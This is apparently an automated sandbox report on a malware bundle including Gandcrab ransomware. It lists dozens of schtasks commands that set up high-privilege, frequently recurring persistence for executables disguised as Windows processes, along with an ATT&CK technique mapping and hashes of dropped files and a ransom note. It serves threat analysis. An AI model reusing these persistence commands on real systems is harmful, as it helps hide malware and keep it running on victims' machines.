C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Gandcrab5.0.3G" /sc MINUTE /mo 14 /tr "'C:\Program Files\Crashpad\attachments\Gandcrab5.0.3.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 8 /tr "'C:\Windows\en-US\firefox.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\apppatch\ja-JP\sppsvc.exe'" /rl HIGHEST /f
1⤵
PID:6160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
1⤵
PID:1428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Windows\apppatch\ja-JP\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Windows\en-US\firefox.exe'" /rl HIGHEST /f
1⤵
PID:6432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Gandcrab5.0.3" /sc ONLOGON /tr "'C:\Program Files\Crashpad\attachments\Gandcrab5.0.3.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Desktop\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
PID:5572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:8180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Gandcrab5.0.3G" /sc MINUTE /mo 11 /tr "'C:\Program Files\Crashpad\attachments\Gandcrab5.0.3.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 7 /tr "'C:\Windows\en-US\firefox.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Desktop\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Default\My Documents\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Reference Assemblies\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\5e710462c65fe899466e4fb7c1e33c9a.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default\My Documents\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Users\Default\My Documents\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Reference Assemblies\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de519071" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\en-US\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
1⤵
PID:4788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907" /sc ONLOGON /tr "'C:\Users\Public\Pictures\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de519071" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Pictures\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7412

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\explorer.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\conhost.exe'" /f
1⤵
PID:6872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\explorer.exe'" /rl HIGHEST /f
1⤵
PID:2564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'" /f
1⤵
PID:6220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\explorer.exe'" /rl HIGHEST /f
1⤵
PID:2132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\conhost.exe'" /rl HIGHEST /f
1⤵
PID:4844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servers" /sc MINUTE /mo 7 /tr "'C:\Windows\tracing\server.exe'" /f
1⤵
PID:6692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "server" /sc ONLOGON /tr "'C:\Windows\tracing\server.exe'" /rl HIGHEST /f
1⤵
PID:3104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:3568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servers" /sc MINUTE /mo 14 /tr "'C:\Windows\tracing\server.exe'" /rl HIGHEST /f
1⤵
PID:7276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\conhost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
PID:6800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\57ccb6f0bd910fed428761828ae93553.exe'" /f
1⤵
PID:7016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:4548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Local Settings\firefox.exe'" /f
1⤵
PID:7176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Users\Admin\Local Settings\firefox.exe'" /rl HIGHEST /f
1⤵
PID:5208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Local Settings\firefox.exe'" /rl HIGHEST /f
1⤵
PID:1296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Videos\spoolsv.exe'" /f
1⤵
PID:5468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Admin\Videos\spoolsv.exe'" /rl HIGHEST /f
1⤵
PID:6760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Videos\spoolsv.exe'" /rl HIGHEST /f
1⤵
PID:1336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Package Cache\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}v64.8.8806\spoolsv.exe'" /f
1⤵
PID:6472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}v64.8.8806\spoolsv.exe'" /rl HIGHEST /f
1⤵
PID:828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Package Cache\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}v64.8.8806\spoolsv.exe'" /rl HIGHEST /f
1⤵
PID:5300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\msedge.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Users\Public\Downloads\msedge.exe'" /rl HIGHEST /f
1⤵
PID:7016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Downloads\msedge.exe'" /rl HIGHEST /f
1⤵
PID:5104

C:\Windows\SysWOW64\wowmgr.exe
C:\Windows\SysWOW64\wowmgr.exe
1⤵
PID:7388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
PID:1332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
PID:1016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
1⤵
PID:6868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
PID:216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
PID:4276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "net1n" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\net1.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "net1" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\net1.exe'" /rl HIGHEST /f
1⤵
PID:5564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "net1n" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\net1.exe'" /rl HIGHEST /f
1⤵
PID:5944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HelpPaneH" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Updates\HelpPane.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HelpPane" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Updates\HelpPane.exe'" /rl HIGHEST /f
1⤵
PID:5940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HelpPaneH" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office\Updates\HelpPane.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Windows\PolicyDefinitions\ja-JP\WmiPrvSE.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\ja-JP\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
PID:5608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\PolicyDefinitions\ja-JP\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:4492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\conhost.exe'" /f
1⤵
PID:5968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\conhost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\conhost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:3232

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:7724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Scripting

T1064

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-523280732-2327480845-3730041215-1000\HOOZZSPFKP-DECRYPT.txt

Filesize
8KB

MD5
9c6720e349e30f44a231c9960aeafa9f

SHA1
8659a104f8efb9231d5562a157adc120749a77e2

SHA256
6366447b82269d34514ab2cdfcc6490bcc2d315ff88f649a8a78ee5f003afc01

SHA512
ddc49bffddb51adf9a1c1dc3c07f614e173d145b612976c2e3449aa41617319b649322929f361994b7c592d022fcb35ba83ea15fe8a8deccd052e7888e20a819

Download Submit
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe

Filesize
233KB

MD5
4ef3177a2e94ce3d15ae9490a73a2212

SHA1
a34f47568ce7fcea97a002eebeae385efa98790c

SHA256
87353d18dfdebf4d0747bbf21d58adaed2b04060d61cba3fa052d522640520f0

SHA512
635ce5c0d1b9f7dd5d7b4c00f216af06dc7d818132ba87a57d3d54f6b30ee01f64430d2aa265f60027cc58dc2e738d5b674ee36ffdca34ff540ce44b7da7c502

Download Submit
C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe

Filesize
55KB

MD5
17315d95e80eb36cc51a7d25e4c8b231

SHA1
95006ad8de0a17dc3df6698e195e62b8ee32475e

SHA256
2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c

SHA512
481a15c46dcf38562aa989f52330e556da90a3ce00190cedb2e00b2a39df5db3bcc3af743060fd8c75933d6ae756aa4bbc176708f36d3b4aa443b4663ca94608

Download Submit
C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe

Filesize
37KB

MD5
5c8eb40a1344bd8b18c1ef0d95d433d4

SHA1
b6c1f037637936ae018cc5e3e17ab9f3cc8cb3ff

SHA256
31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65

SHA512
74aa4c3047e5fff0b0d903841ceb01cd0e9939244c9008a9ae6a77ee5484290e7a0df56bbfc422ff5cf80012e84b75af2cf8840fd6ce6c80ea361fa07e5da577

Download Submit
C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe

Filesize
93KB

MD5
7299c8fe0d2e5c385c4e4711260ee2b5

SHA1
4814f8494c3ff005203838e25a62cdb1ce5f8d68

SHA256
34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219

SHA512
2103b6e574657998159979c0d1e9021175732fffbfcba4ac1c3f778b33010129b9b9467b6f6a1e5f4095e9bf62d2212654f20c5a051cbb72158a2a8f399dfaad

Download Submit
C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe

Filesize
3.2MB

MD5
57ccb6f0bd910fed428761828ae93553

SHA1
71dfe6354ac308d03cf7219686358652b9a8d438

SHA256
7d357b523b5116915747af1fb0d5e6b20a472dd08fd4eda3d0733aeaf70dcd07

SHA512
44423e3df0d34d8917c82103f336cf0c61cd0aa2e3722e3baf9224daf0b620009967136b1625d2f783b1e36207ac529008d49235ae2ae50b01a9b053d0ba0878

Download Submit
C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe

Filesize
828KB

MD5
5e710462c65fe899466e4fb7c1e33c9a

SHA1
a0bee34a8865683de35502c1ed5ff41e86670718

SHA256
f4f54ed5ec3a6e3b427be418fa0f63061e2feffbb9c33ab3911404b1b8f93c7e

SHA512
35c4adede7a4f8baad61876de8821e91dfe4ace4ec721575fc8155f6e7d43c794a7d4741609fda24b16a82d3d9ae18bc35addb299416f59ad1cde74eedbfa0c2

Download Submit
C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe

Filesize
568KB

MD5
4448a3c2ddfdda45009b440faa39a5fe

SHA1
b16a26331d6ebe8f4a45b43e8b0251a715139b10

SHA256
70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2

SHA512
094cef6184c29430be5e4536b54cdfa632b52e7e09c7a4c04104d1b533113f6de6190d6525aac84ddba631220ee0b33a047272b952765977df336a5fa72425b0

Download Submit
C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe

Filesize
827KB

MD5
73c1c41b9e71c48e752a5cd19fe808b6

SHA1
b8bd41a0b9dc7baef6eb01dfe6c852afdfaeed18

SHA256
fce441edb227275c5380194cc7a96a95998de6d75cd601b73bce1be529a68bd6

SHA512
f146a8917d39aa29d52386f5a23bbc01fbfade291d576782b5cc80b0ca363fa24fee80f00cf81ffa40e12503fedd203b422b7ad97dbb0d4500152e86d974cb38

Download Submit
C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe

Filesize
268KB

MD5
fc57a660e24d9c91cb5464b2ece30756

SHA1
6d70e4dcd68ea6dae43cc381d4be84bcfad38eda

SHA256
75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa

SHA512
8f0fa0a2e5553a4059ac3e224ea8106131193f3cec7c23456507f8404c42440267efe88462cf31bcd3a6f9dba57011933a2a43e74b1cccd5d1a363497d1a3a67

Download Submit
C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe

Filesize
205KB

MD5
887b35a87fb75e2d889694143e3c9014

SHA1
c8be4500127bfce10ab38152a8a5003b75613603

SHA256
78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae

SHA512
98cf0e201092e6d43a7ec5db4d80e6cc20ec9a983098b04597039b244535f78a4096b76bc62e591336b810fafa302e1009a64be6e788f24dcc8b3ac0c8eb930a

Download Submit
C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe

Filesize
175KB

MD5
7f1630df6b57af024a3b561bdadc208f

SHA1
9b304cb2eff05f040b76eccc00ee55b914cf1839

SHA256
c9dbac4fe659e8918f50a4a157713e40d71e05367799af66d1d7845d958ee3f7

SHA512
742219cb5c76b9d39ed56cff988a533d19ef3e202e0fa48e9a3aed7dd9de190eef0c313bc974e37e7f363892eb6787bc66657324be2f0fb05d1b0021ae61ec9e

Download Submit
C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe

Filesize
308KB

MD5
938b92958ded4d50a357d22eddf141ad

SHA1
062f16b1cdfacc55f982908ee6c85fce6296805a

SHA256
93c8db29ec3707f13bf5a96d5b8a3dc33c2f5b870acd3df07292c724ce10a13f

SHA512
372942601188751cdbb79cc94469a66434ca2963591bb849137654622485cd92f4ac8fbbc9b83c3acdc128e354bb3b805af0fc0a465e0a2519d330f8ca9a6c36

Download Submit
C:\Program Files (x86)\BTZ.exe

Filesize
73KB

MD5
cff0392ac2a1d782f43f7938ea18af4f

SHA1
1dfd93a3106a1b4fd10cfaf8b8bb4bb606c4093d

SHA256
ecfed4163f7058856e1d253a29d06d808c069670e4a06cad66f42e71cbc83a2e

SHA512
134f6c8343bbcce6e23ae370193aa1b415f337790e13b2cd6171e657c775c7971a7b13146d930b5273b0ea64ee947df1cc5467e4dd52900d70f13550c6b9ae8b

Download Submit
C:\Program Files (x86)\Cat.exe

Filesize
2.1MB

MD5
fadadf302e5b6c4010d700a3802ac678

SHA1
6548d465ae4facaa1d2d1921e423a7b871bcf36b

SHA256
d61f36d7dc8cc8464434ee6fa72fec2d1e210978769d1443db08f1decd845f67

SHA512
571db891718f1cc7e260772054ec39592259fdb3238dab90071a8ab7eeddc5baf2de2719f12f246a4a0466da7b72776a49f51da124afff936cd78f4253b5646b

Download Submit
C:\Program Files (x86)\Client.exe

Filesize
100KB

MD5
21560cb75b809cf46626556cd5fbe3ab

SHA1
f2eec01d42a301c3caacd41cddb0ef2284dbb5a6

SHA256
d2525bab5cb322933c8978880975e0c189feece68ae3f1951bf46297c7f640fa

SHA512
21eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db

Download Submit
C:\Program Files (x86)\Darkest Dungeon setub.exe

Filesize
284KB

MD5
382c21837fbb296675b92c64bbc6249d

SHA1
ddedd90110497139ee0b5fca0e8ea3b585271f6d

SHA256
6ba1d9cf4b63033c0d9752fbe663eee726a5cf5401b20b8b8e927cca39cf113d

SHA512
3a7cc906a9bc94526b0f0fbaff43fa6230e14d0226439d1558b1e09d258911beb79fbfdb56c9286373856dca958dd5decb10c42e7248763dde1e1e85a3aae727

Download Submit
C:\Program Files (x86)\Gandcrab5.0.3.exe

Filesize
424KB

MD5
95557a29de4b70a25ce62a03472be684

SHA1
5baabf2869278e60d4c4f236b832bffddd6cf969

SHA256
49b769536224f160b6087dc866edf6445531c6136ab76b9d5079ce622b043200

SHA512
79b78cf77926e0d8b424ad9984f72d4461c7d9e7af58c4e2af32fa7c58cc445c534228b0709b87f5e35e1c8793b3d028dc60787151d852b8524023d08b57f103

Download Submit
C:\Program Files (x86)\Happy18.exe

Filesize
9KB

MD5
8c0ec9b7f903dce401ac301fbf43e930

SHA1
46db7e2a37d95eb1265b30c1557a5e80683b48f1

SHA256
